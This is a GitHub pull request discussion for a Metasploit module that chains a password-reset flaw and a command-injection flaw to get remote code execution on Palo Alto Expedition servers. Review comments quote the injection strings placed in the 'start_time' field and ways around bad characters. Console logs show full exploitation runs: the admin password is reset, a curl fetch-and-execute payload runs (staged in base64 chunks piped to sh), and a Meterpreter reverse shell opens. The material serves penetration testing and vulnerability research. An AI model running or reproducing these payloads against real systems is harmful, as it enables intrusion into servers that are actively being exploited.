[DRAFT] Palo Alto Expedition RCE (CVE-2024-5910 & CVE-2024-9464) Module
rapid7/metasploit-framework pull request #19557
Opened 2024-10-11 18:35 UTC by h4x-x0r

This is a new module which exploits two vulnerabilities (CVE-2024-5910 & CVE-2024-9464) in Palo Alto Expedition to obtain RCE.

Basic module is working; I'll do some cleanup etc. and try to publish it during the weekend.

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
```suggestion
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK, ACCOUNT_LOCKOUTS]
```

As the admin password is reset.

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    end
```suggestion
    fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
```

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    vprint_status("csrftoken: #{csrftoken}")
```suggestion
    vprint_status("Got csrftoken: #{csrftoken}")
```

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +      end
```suggestion
      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
```

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +      respass = res.to_s.match(/'([^']+)'/)[1]
What value are you trying to match here? It would be nice to provide an example as a comment.

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    end
```suggestion
    if version.nil?
      return CheckCode::Unknown
    end
    
    print_status('Version retrieved: ' + version)
    
    if Rex::Version.new(version) > Rex::Version.new('1.2.95')
      return CheckCode::Safe
    end
    
    return CheckCode::Appears
```

- No need for an `if-else` if the `if` results in a return.
- As the `check` method is basically a collection of conditions with the last one returning "vulnerable yay!", I think it's better to have the last return being `CheckCode::Appears`.

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +  def execute_command(cmd)
```suggestion
  def exploit()
    cmd = payload.encoded
```

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmd = cmd.gsub('http://', '').gsub(':', '$(echo $PATH|cut -c16)')
Maybe add a comment explaining why/how `$(echo $PATH|cut -c16)` works.
Also, why `cmd.gsub('http://', '')`? And why not `cmd.gsub('https://', '')` too?

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; #{cmds[0]} ;"
```suggestion
        'start_time' => "\";#{cmds[0]} #"
```

Spare one space, and will prevent the rest of the original command from executing and generate an error in the logs.

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; #{cmds[1]} ;"
```suggestion
        'start_time' => "\";#{cmds[1]} #"
```

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; #{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} ;"
```suggestion
        'start_time' => "\";#{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} #"
```

2024-10-14 12:50 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; rm #{dropper} ;"
```suggestion
        'start_time' => "\";rm #{dropper} #"
```

2024-10-14 14:12 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
Good catch, thank you.

2024-10-14 14:12 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    end
Updated, thank you.

2024-10-14 14:15 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; #{cmds[0]} ;"
Thank you, updated.

2024-10-14 14:15 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; #{cmds[1]} ;"
Updated, thank you.

2024-10-14 14:16 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; #{cmds[2].gsub('&', '').gsub(/\s+/, ' ').strip} ;"
Updated, thank you.

2024-10-14 14:16 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +        'start_time' => "\"; rm #{dropper} ;"
Updated, thank you.

2024-10-14 14:20 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +      respass = res.to_s.match(/'([^']+)'/)[1]
The response looks like this:
```
✓	Connected successfully to the database
✓	Admin user found
✓	Admin password restored to:    'paloalto'
```

I've added an example as a comment. I wasn't sure if `paloalto` is the default password throughout all versions, so I'm retrieving it dynamically.

2024-10-14 14:34 UTC, byt3n33dl3 requested changes
Wow World!

2024-10-14 14:48 UTC, jvoisin commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo $PATH|cut -c16)') # ':' breaks the injection; $PATH on Ubuntu 20.04 contains '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bi
Would this trick work on other distributions?

2024-10-17 14:46 UTC, adfoster-r7 commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo $PATH|cut -c16)') # ':' breaks the injection; $PATH on Ubuntu 20.04 contains '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bi
Or potentially:

```
printf "\x3a"
```

2024-10-17 17:05 UTC, cdelafuente-r7 reviewed
Thanks @h4x-x0r for this module! I left a few comments and suggestions for you to review when you get a chance.

2024-10-17 17:36 UTC, adfoster-r7 commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo $PATH|cut -c16)') # ':' breaks the injection; $PATH on Ubuntu 20.04 contains '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bi
I'm guessing @cdelafuente-r7's suggestion wasn't meant to include the `\n`:

```
$ echo Ogo= | base64 -d | xxd 
00000000: 3a0a                                     :.
```

So just `Og== | base64 -d` (from `echo -n ':' | base64`) I believe

2024-10-20 17:55 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +              'Platform' => [ 'linux' ],
Thank you for reviewing the module! I've updated the platforms as suggested.

2024-10-20 17:56 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +              'Type' => :unix_cmd
Updated, thank you.

2024-10-20 17:57 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +      fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
Updated, thank you.

2024-10-20 17:59 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +      fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{res.body}") unless res.code == 200 && res.to_s.include?('Admin password restored to')
Updated, thank you.

2024-10-20 18:06 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmd = cmd.gsub('http://', '').gsub('https://', '').gsub(':', '$(echo $PATH|cut -c16)') # ':' breaks the injection; $PATH on Ubuntu 20.04 contains '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bi
Nice, that should make it more reliable throughout different distributions, thank you.

2024-10-20 18:11 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmds = cmd.split(';')
Yeah, it could break it in certain scenarios. For the default payloads created through MSF, all my tests worked fine though. Not sure what a better way would be that works universally without adding a lot of specific checks against the payload.

2024-10-20 18:15 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    version = data['msg']['Expedition']
Updated, thank you!

2024-10-20 18:31 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    fail_with(Failure::Unreachable, 'Failed to receive a reply from the server.') unless res
Thank you! I've updated the code.

2024-10-20 18:37 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    fail_with(Failure::UnexpectedReply, "Unexpected reply from the server: #{data}") unless data['csrfToken']
Thank you. I've updated all locations, I think, although I'm not completely sure if I got everything right.

2024-10-21 20:24 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +      datastore['USERNAME'] = 'admin'
Thank you for reviewing the module!

> * The `check` method is not suppose to make modifications on the target. Reseting the Admin password should not be automatically done if the user did not provide username and password.

The reset only happens if the user has specifically set a username and password:
```
  unless datastore['USERNAME'] && datastore['PASSWORD']
      res = send_request_cgi(
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, 'OS/startup/restore/restoreAdmin.php')
      )
[...]
```

I'll add a flag as you suggested and also incorporate the other suggestions, thank you.

2024-10-21 20:27 UTC, bwatters-r7 commented
FWIW, I was not able to get this installed with the instructions- they've updated the install package, but I was able to get a vulnerable docker container:
```
docker pull jlegarreta/expedition

docker run --detach --cap-add syslog --volume ${HOME}/expedition/data:/data --volume ${HOME}/expedition/db:/var/lib/mysql --publish 443:443 --publish 4050:4050 jlegarreta/expedition:latest
```

2024-10-21 20:33 UTC, bwatters-r7 commented
```
msf6 exploit(linux/http/paloalto_expedition_rce) > show options

Module options (exploit/linux/http/paloalto_expedition_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   paloalto         no        Password for the specified user
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.5.134.101     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-met
                                         asploit.html
   RPORT      443              yes       The target port (TCP)
   SSL        True             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The URI for the Expedition web interface
   USERNAME   admin            no        Username for authentication, if available
   VHOST                       no        HTTP server virtual host


Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      Z                no        Name to use on remote system when storing payload; cannot contain spaces or slash
                                                  es
   FETCH_SRVHOST                        no        Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  /tmp             yes       Remote writable dir to store payload; cannot contain spaces
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux Command



View the full module info with the info, or info -d command.

msf6 exploit(linux/http/paloalto_expedition_rce) > check

[+] Successfully authenticated
[*] Got csrftoken: MTcyOTU0MjcwMmNUTjJzNXFKVjg3WjNxbVRxWUwyaEhtaTVVY0NqcGVh
[*] 1.1.96
[*] Version retrieved: 1.1.96
[*] 10.5.134.101:443 - The target appears to be vulnerable.
msf6 exploit(linux/http/paloalto_expedition_rce) > run

[*] Command to run on remote host: curl -so /tmp/Z http://10.5.135.201:8080/v3vZxR3P-stuKWjUe6pCeA; chmod +x /tmp/Z; /tmp/Z &
[*] Fetch handler listening on 10.5.135.201:8080
[*] HTTP server started
[*] Adding resource /v3vZxR3P-stuKWjUe6pCeA
[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Successfully authenticated
[*] Got csrftoken: MTcyOTU0MjcwN2FJSnFOY3F0blV4ZE5ZekpwRGJzU2JmM3V5eFVCWEF6
[*] 1.1.96
[*] Version retrieved: 1.1.96
[+] The target appears to be vulnerable.
[+] Successfully authenticated
[*] Got csrftoken: MTcyOTU0MjcwOHlFMFJGSkVCNmhSVVdxMk1DbHBiWnczOVp2U1UwT1Jn
[*] Adding a new cronjob...
[*] Using random name: DGvv
[*] Injecting OS command...
[*] Client 10.5.134.101 requested /v3vZxR3P-stuKWjUe6pCeA
[*] Sending payload to 10.5.134.101 (curl/7.47.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 10.5.134.101
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.134.101:52604) at 2024-10-21 15:31:50 -0500
[*] Check thy shell.

meterpreter > sysinfo
Computer     : 172.17.0.2
OS           : Ubuntu 16.04 (Linux 5.15.0-27-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > 
```

2024-10-22 02:44 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +      datastore['USERNAME'] = 'admin'
Thanks again for your feedback. I think the updated code should cover now all outlined issues.

2024-11-08 15:48 UTC, bwatters-r7 commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmds = cmd.split(';')
Yes; part of the reason this has not been landed yet is that I'm trying to come up with a solution to this payload packaging problem- it is an edge case that's frustrating.

1) By splitting the payload, we're relying that it is not encoded.  Encoding is great because it would solve the badchar issue we also face.  If this is encoded, the split will break.
2) We can easily create a raw fetch payload below the minimum command size by modifying the filename and url, to being 1-3 chars, but it will fail becuse of `:` and `;` characters in the command.  Adding encoding explodes the size well past the minimum size.  Part of the reason we need to split it is so that we get rid of the `;` chars, not just because of the size.
3) It is possible that we could fall back to the `cmdstager` because `cmdstager` will support splitting the command automatically by `linemax`.   Unfortunately, that's not as good as it sounds because the split is on the raw payload and encoding is not predictable, but will make the command much longer and it does support encoding, so we'd be falling back to almost exactly what we're doing here, except on less predictable splits in the payload and a layer of obfuscation.
4) The end result may well be to create the worst filedropper known to humanity by using `cmdstager` and a binary payload we upload about 60 bytes at a time.....

2024-11-08 16:31 UTC, bwatters-r7 commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmds = cmd.split(';')
After talking with Spencer, we have a plan, and I'll see if I can get you a PR today.

2024-11-08 19:58 UTC, h4x-x0r commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +    cmds = cmd.split(';')
Thanks a lot for your review and support in getting this through!

2024-11-09 01:42 UTC, bwatters-r7 commented
I PR'd some changes that let this work with payloads of any size and it  avoids the need to manual encoding: https://github.com/h4x-x0r/metasploit-framework/pull/2

2024-11-12 03:39 UTC, h4x-x0r commented
@bwatters-r7 Thank you, looks great! All my tests worked fine:
```
msf6 exploit(linux/http/paloalto_expedition_rce) > exploit 

[*] Command to run on remote host: curl -so /tmp/zRe http://192.168.137.204:8080/qv_gAdz7yjcgH-ohM3GesA; chmod +x /tmp/zRe; /tmp/zRe &
[*] Fetch handler listening on 192.168.137.204:8080
[*] HTTP server started
[*] Adding resource /qv_gAdz7yjcgH-ohM3GesA
[*] Started reverse TCP handler on 192.168.137.204:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] Admin password successfully restored to default value paloalto (CVE-2024-5910).
[+] Successfully authenticated
[*] Got csrftoken: MTczMTM4MjY0NUNRV0RkNXBXR3Vic2hkR1ZZTHBSQTd1cWY5MjVWYWIw
[*] Version retrieved: 1.2.91
[+] The target appears to be vulnerable.
[*] Command chunk size = 30
[+] Successfully authenticated
[*] Got csrftoken: MTczMTM4MjY0NnpDVDRUcXdDRWhvZ09HWDNnMFdHUW81cXU2aHppTEdE
[*] Adding a new cronjob...
[*] Staging chunk 1 of 9
[*] Running command: echo -n "echo Y3VybCAtc28gL3RtcC96UmUga" > /tmp/fglGT
[*] Staging chunk 2 of 9
[*] Running command: echo -n "HR0cDovLzE5Mi4xNjguMTM3LjIwNDo" >> /tmp/fglGT
[*] Staging chunk 3 of 9
[*] Running command: echo -n "4MDgwL3F2X2dBZHo3eWpjZ0gtb2hNM" >> /tmp/fglGT
[*] Staging chunk 4 of 9
[*] Running command: echo -n "0dlc0E7IGNobW9kICt4IC90bXAvelJ" >> /tmp/fglGT
[*] Staging chunk 5 of 9
[*] Running command: echo -n "lOyAvdG1wL3pSZSAm|((command -v" >> /tmp/fglGT
[*] Staging chunk 6 of 9
[*] Running command: echo -n " base64 >/dev/null && (base64 " >> /tmp/fglGT
[*] Staging chunk 7 of 9
[*] Running command: echo -n "--decode || base64 -d)) || (co" >> /tmp/fglGT
[*] Staging chunk 8 of 9
[*] Running command: echo -n "mmand -v openssl >/dev/null &&" >> /tmp/fglGT
[*] Staging chunk 9 of 9
[*] Running command: echo -n " openssl enc -base64 -d))|sh" >> /tmp/fglGT
[+] Command staged; command execution requires a timeout and will take a few seconds.
[*] Running command: cat /tmp/fglGT | sh && rm /tmp/fglGT
[*] Client 192.168.137.205 requested /qv_gAdz7yjcgH-ohM3GesA
[*] Sending payload to 192.168.137.205 (curl/7.68.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.137.205
[*] Meterpreter session 10 opened (192.168.137.204:4444 -> 192.168.137.205:58030) at 2024-11-11 22:37:40 -0500
[*] Check thy shell.

meterpreter > sysinfo
Computer     : 192.168.137.205
OS           : Ubuntu 20.04 (Linux 5.4.0-42-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
```

2024-11-12 13:13 UTC, bwatters-r7 commented
Perfect!  I think the last thing we need to do is get the docs updated (see comment) and I'll try and get another set of eyes and approval so we can land this.  I'd love to get it in this week, as CISA just added it to the [KEV list](cisa.gov/known-exploited-vulnerabilities-catalog) Thursday.

2024-11-12 14:15 UTC, bwatters-r7 commented on modules/exploits/linux/http/paloalto_expedition_rce.rb
> +          [ 'URL', 'https://security.paloaltonetworks.com/CVE-2024-5910'],
```suggestion
          [ 'URL', 'https://security.paloaltonetworks.com/CVE-2024-5910'],
          ['URL', 'https://attackerkb.com/topics/JwTzQJuBmn/cve-2024-5910'],
          ['URL', 'https://attackerkb.com/topics/ky1MIrne9r/cve-2024-9464']
```

2024-11-12 14:48 UTC, smcintyre-r7 approved these changes

2024-11-12 22:42 UTC, merged

2024-11-12 22:45 UTC, bwatters-r7 commented
# Release Notes
Adds a module to chain CVE-2024-5910, a password reset vulnerability with CVE-2024-9464, an authenticated command-injection vulnerability to gain code execution on PaloAlto Expedition servers between versions after 1.2 and before 1.2.92 with or without knowledge of the credentials.

2024-11-12 22:46 UTC, bwatters-r7 commented
Thanks for your patience with this one, @h4x-x0r!

2024-11-12 22:47 UTC, h4x-x0r commented
Thanks everyone for your help in getting this merged. :)